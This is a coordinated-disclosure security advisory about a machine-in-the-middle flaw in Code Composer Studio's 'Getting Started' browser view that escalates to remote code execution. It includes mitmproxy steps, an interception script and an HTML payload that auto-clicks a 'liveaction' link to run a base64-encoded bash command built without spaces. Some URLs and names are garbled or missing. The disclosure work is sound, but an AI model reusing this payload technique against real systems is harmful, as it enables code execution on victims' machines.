
The insecure configuration of JxBrowser in the “Getting Started” view of Code Composer Studio (CCS) allows a machine-in-the-middle attack (MiTM) which can be escalated to remote code execution (RCE).


Code Composer Studio

Tested Version

Code Composer Studio


Texas Instruments’ Code Composer Studio is an integrated development environment that supports TI’s microcontroller (MCU) and embedded processor portfolios.

When CCS is first started it opens the “Getting Started” view: The "Getting Started" view of CCS is shown. This view uses JxBrowser, a Java binding for the Chromium browser, to show a YouTube playlist. Unfortunately, JxBrowser before version 6.24 ignored certificate errors by default!

This trivially allows an attacker to perform a machine-in-the-middle attack, because any certificate will be accepted.

We can use mitmproxy to perform a machine-in-the-middle attack:

  1. Download this script that will intercept the request.
  2. Run mitmproxy -s --listen-port 8080 in a terminal.
  3. Run export HTTPS_PROXY=http://localhost:8080. So that CCS/JxBrowser will connect to mitmproxy.
  4. Run ccs/eclipse/ccstudio to start CCS.
  5. Navigate to “View” -> “Getting Started” if it doesn’t open by default.
  6. A calculator should pop up (kcalc must be installed).

What did we do to trigger the RCE? Let’s have a look at

def response(flow: http.HTTPFlow):
    if (
        in flow.request.pretty_url
        custom_response = http.HTTPResponse.make(
            rceCausingResponse,  # <- replace with attack
        flow.response.content = custom_response.content  # <- change the response

We are using the interception API provided by mitmproxy to check whether the requested URL is If it is, we replace the HTTP response with our attack.
The variable rceCausingResponse contains our attack and looks like this:

rceCausingResponse = """[...]
<a target="_parent" id="foo"
href="liveaction:RunProgramAction(/usr/bin/bash -c '{echo,a2NhbGMK}|{base64,-d}|bash')"
>oh no</a>
<img src="null" onerror="document.querySelector('#foo').click()">

The response consists of a link and an image with a null source. The image’s onerror handler will fire due to the null source which will then trigger a click on the link with the custom liveaction protocol!
This protocol is implemented in CCSIntroPart by listening to changes to the browser location and calling ResourceExplorerUtils.executeLiveAction on the new location. The method ResourceExplorerUtils.executeLiveAction then checks whether the URL starts with the liveaction protocol.

CCSIntroPart.this.browser.addLocationListener((LocationListener) new LocationListener() {
    public void changing(final LocationEvent event) {
        final String location = event.location;
        if (ResourceExplorerUtils.executeLiveAction(location,
            CCSIntroPart.this.browser.getUrl(), [...])) {
            event.doit = false;

The class name of the action, RunProgramAction in our case, and its arguments, /usr/bin/bash -c '{echo,a2NhbGMK}|{base64,-d}|bash', will get extracted if the URL uses the liveaction protocol. The RunProgramAction class then gets instantiated which passes the arguments to Runtime.getRuntime().exec() like this:

Runtime.getRuntime().exec("/usr/bin/bash -c '{echo,a2NhbGMK}|{base64,-d}|bash'", [...], [...]);

Why does '{echo,a2NhbGMK}|{base64,-d}|bash' not look like a “normal” command, why are there no spaces?
The overload of the exec method takes a String as its first argument which will then be split by space into an array of Strings. So if we had the command /usr/bin/bash -c 'touch /tmp/owned' it would be split into this array: ["/usr/bin/bash", "-c", "'touch", "/tmp/ownde'"] which would fail to execute!

Creating a Bash Command Without Spaces

How do we create a bash command without spaces? Brace Expansion to the rescue!

$ echo {he,llo,world}
he llo world

Brace expansion will helpfully add the spaces back for us :)

Building the Final Command

We now know how to create a command without spaces and we only have to put all pieces together.

  1. Encode the command we want to execute using Base64. We do this because it means we can easily use commands with spaces, because Base64 encodes any spaces. In our case we want to run xkalc which gets encoded as a2NhbGMK.
  2. {echo,a2NhbGMK} will expand back to echo a2NhbGMK (via brace expansion).
  3. This is then piped to {base64,-d} (expands to base64 -d) which decodes it back as xkalc.
  4. And finally everything is piped to bash, executing xkalc.

This brings us to the final command '{echo,a2NhbGMK}|{base64,-d}|bash' as seen above.





Coordinated Disclosure Timeline

  • 2020-07-28: Sent report to
  • 2020-09-21: CCS is released with a fix.
  • 2021-01-26: CVE is assigned.


This issue was discovered and reported by @intrigus-lgtm.


You can contact the ISL at Please include a reference to ISL-2020-004 in any communication regarding this issue.